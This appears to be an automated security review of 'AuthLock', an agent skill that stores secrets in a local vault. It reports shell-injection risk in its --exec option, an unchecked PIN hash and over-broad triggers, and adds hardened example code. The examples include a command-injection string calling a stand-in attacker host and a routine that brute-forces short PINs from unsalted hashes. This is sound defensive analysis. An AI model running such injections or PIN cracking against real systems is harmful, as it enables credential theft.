authlock

Security checks across malware telemetry and agentic risk

Overview

AuthLock is a coherent local secret-vault tool, but its security model is under-scoped for high-value secrets: the TOTP seed is stored locally in plaintext, so anyone who can read it can generate valid codes and the MFA adds no second factor against local compromise, and the --exec option hands decrypted credentials to arbitrary shell commands.

Install only if you understand that this is a local file-based vault, not hardware-backed MFA. Protect the .authlock directory, avoid decrypting to stdout through an agent, use --exec only with commands you wrote and trust, and do not store critical production credentials unless you accept the local-seed security model.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
Findings (9)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
    try:
        os.chmod(tmp_path, 0o600)
        cmd = args.exec.replace("-", tmp_path)
        subprocess.run(cmd, shell=True)
    finally:
        os.unlink(tmp_path)
else:
Confidence
98% confidence
Finding
subprocess.run(cmd, shell=True)
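
The excerpt has two problems beyond shell=True itself: str.replace("-", tmp_path) rewrites every hyphen in the command, including the hyphen of option flags (the README's own `ssh -i - user@host` becomes `ssh <tmp>i <tmp> user@host`), and the substituted string is handed to /bin/sh, so any metacharacter in the --exec value is live. The following is an added example, not AuthLock's code: it reproduces the excerpt's substitution and sets a hardened form beside it that tokenizes the command, substitutes only a standalone placeholder token, and runs an argv list without a shell. The names build_argv, run_with_secret and demo_read_back, and the placeholder constant, are this example's own assumptions.

```python
import os
import shlex
import subprocess
import sys
import tempfile

# Placeholder the user writes in --exec to mean "path of the decrypted file".
PLACEHOLDER = "-"


def build_shell_command(exec_template: str, tmp_path: str) -> str:
    """Pattern from the excerpt: plain string replace, then shell=True.

    Every '-' is rewritten, including the hyphen of option flags, and the
    result would go to /bin/sh, so metacharacters in the template are live.
    """
    return exec_template.replace(PLACEHOLDER, tmp_path)


def build_argv(exec_template: str, tmp_path: str) -> list:
    """Hardened form: tokenize, substitute only a standalone placeholder
    token, and return an argv list to run with shell=False."""
    argv = shlex.split(exec_template)
    if argv.count(PLACEHOLDER) != 1:
        raise ValueError(
            "the --exec command must name the secret file exactly once as a standalone '-'"
        )
    return [tmp_path if tok == PLACEHOLDER else tok for tok in argv]


def run_with_secret(exec_template: str, secret: bytes) -> subprocess.CompletedProcess:
    """Write the secret to a 0600 temp file, run argv without a shell, unlink."""
    fd, tmp_path = tempfile.mkstemp()  # created with mode 0600 on POSIX
    try:
        os.write(fd, secret)
        os.close(fd)
        argv = build_argv(exec_template, tmp_path)
        return subprocess.run(argv, shell=False, capture_output=True)
    finally:
        os.unlink(tmp_path)


def demo_read_back(secret: bytes) -> bytes:
    """Run a small reader (the current interpreter) over the secret file and
    return what it printed, stripped of the trailing newline."""
    reader = f"{sys.executable} -c 'import sys; print(open(sys.argv[1]).read())' -"
    return run_with_secret(reader, secret).stdout.strip()


if __name__ == "__main__":
    print(build_shell_command("ssh -i - user@host", "/tmp/k"))
    print(build_argv("ssh -i - user@host", "/tmp/k"))
    # A template shaped like an injection stays a list of literal arguments.
    print(build_argv("cat - ; curl http://attacker.example/", "/tmp/k"))
    print(demo_read_back(b"hunter2"))
```

With shell=False the `;` and `curl ...` tokens reach `cat` as ordinary filenames and nothing else is launched; with the excerpt's shell=True the same template would run both commands.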

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill declares no permissions while its documented behavior clearly relies on environment variables, filesystem access, and shell execution. This under-declaration is dangerous because it prevents accurate risk review and can cause an agent platform to invoke a skill with broader capabilities than users or administrators expect.

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding
The skill markets itself as MFA-bound secret protection, but the documented behavior includes arbitrary command execution with decrypted secrets, local plaintext storage of the TOTP seed, and broader secret-management operations not reflected in the description. This mismatch is dangerous because reviewers and users may trust the skill as a narrow encryption tool while it actually enables secret exposure and code execution pathways.

Context-Inappropriate Capability

High
Confidence
96% confidence
Finding
A tool advertised as MFA-bound secret protection should decrypt and return data, not act as a general command launcher over decrypted content. This feature materially increases blast radius: once a secret is opened, the tool can be used to execute arbitrary programs against it, which makes accidental exfiltration or abuse much easier.

Intent-Code Divergence

Medium
Confidence
99% confidence
Finding
The configuration code stores a `pin_hash`, but the seal/open operations never compare anything against that stored value; they simply derive the encryption key from whatever PIN is entered at the time. This is a misleading security control: users may believe the configured PIN is enforced, when in reality the stored hash performs no authentication check. A wrong PIN produces a wrong key, so open fails or yields garbage rather than a clear rejection, and the setting produces lockout and confusion rather than real protection.
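
An added example, not AuthLock's code, of what this finding describes and of the check it lacks. Instead of a stored `pin_hash` that is never consulted, the configuration keeps a salt plus a key-check value computed from the derived key, and open rejects a wrong PIN before any decryption is attempted. The KDF parameters, the key-check label, and the assumption that a stored pin_hash would be an unsalted fast hash of the PIN (the excerpt does not show how it is computed) are this example's own; the last function shows why such a hash of a short PIN is itself an offline oracle.

```python
import hashlib
import hmac
import os

# Assumed KDF parameters for the example (AuthLock's real ones are not shown).
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1
KEY_LEN = 32


def derive_key(pin: str, salt: bytes) -> bytes:
    """Derive the vault key from the PIN; a wrong PIN silently yields a wrong key."""
    return hashlib.scrypt(
        pin.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_LEN
    )


def key_check_value(key: bytes) -> bytes:
    """16-byte tag bound to the derived key, not to the PIN itself (label assumed)."""
    return hmac.new(key, b"authlock-example-kcv", hashlib.sha256).digest()[:16]


def init_config(pin: str) -> dict:
    """What to store instead of pin_hash: a salt and a check value of the key."""
    salt = os.urandom(16)
    return {"salt": salt, "kcv": key_check_value(derive_key(pin, salt))}


def open_key(config: dict, pin: str) -> bytes:
    """The check the finding says is missing: reject a wrong PIN before use."""
    key = derive_key(pin, config["salt"])
    if not hmac.compare_digest(key_check_value(key), config["kcv"]):
        raise PermissionError("wrong PIN")
    return key


def fast_pin_hash(pin: str) -> str:
    """Assumed weak form of a stored pin_hash: unsalted SHA-256 of the PIN."""
    return hashlib.sha256(pin.encode()).hexdigest()


def crack_fast_pin_hash(pin_hash: str, digits: int = 4):
    """Recover a short numeric PIN offline from an unsalted fast hash."""
    for n in range(10 ** digits):
        guess = f"{n:0{digits}d}"
        if fast_pin_hash(guess) == pin_hash:
            return guess
    return None


if __name__ == "__main__":
    cfg = init_config("4729")
    print(open_key(cfg, "4729").hex())
    try:
        open_key(cfg, "0000")
    except PermissionError as exc:
        print("rejected:", exc)
    print(crack_fast_pin_hash(fast_pin_hash("4729")))
```

Binding the check value to the scrypt output means a guess costs one full KDF run, whereas a fast hash of a four-digit PIN falls to ten thousand SHA-256 calls.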

Vague Triggers

Medium
Confidence
82% confidence
Finding
The trigger keywords are broad enough to match ordinary discussions about passwords, certificates, or MFA, which can cause the skill to activate in contexts where the user did not intend secret-handling or shell-capable behavior. In a secret-management skill, over-broad auto-triggering increases the chance of unnecessary exposure of sensitive paths, secret names, or operational prompts.

Vague Triggers

Medium
Confidence
81% confidence
Finding
The standalone keyword list lacks contextual constraints and repeats generic phrases, making accidental invocation more likely. Because this skill deals with decryption workflows and secret references, ambiguous triggering can expose users to unsafe prompts or unintended secret-management actions.

Missing User Warnings

High
Confidence
95% confidence
Finding
The tool can execute commands on decrypted data without an explicit warning or constrained execution model. In this context, decrypted secrets are highly sensitive, so silently handing them to shell commands creates a strong risk of exfiltration, command injection, or unintended persistence in process arguments, logs, or child tools.

Credential Access

High
Category
Privilege Escalation
Content
authlock open my-server-key --code 123456

# Decrypt to file
authlock open my-server-key --code 123456 --output ~/.ssh/id_rsa

# Decrypt and execute (SSH example)
authlock open prod-ssh-key --code 123456 --exec "ssh -i - user@host"
Confidence
95% confidence
Finding
~/.ssh/id_rsa

VirusTotal

67/67 vendors flagged this skill as clean. A clean antivirus verdict covers known-malicious code and signatures only; it does not address the design findings above.
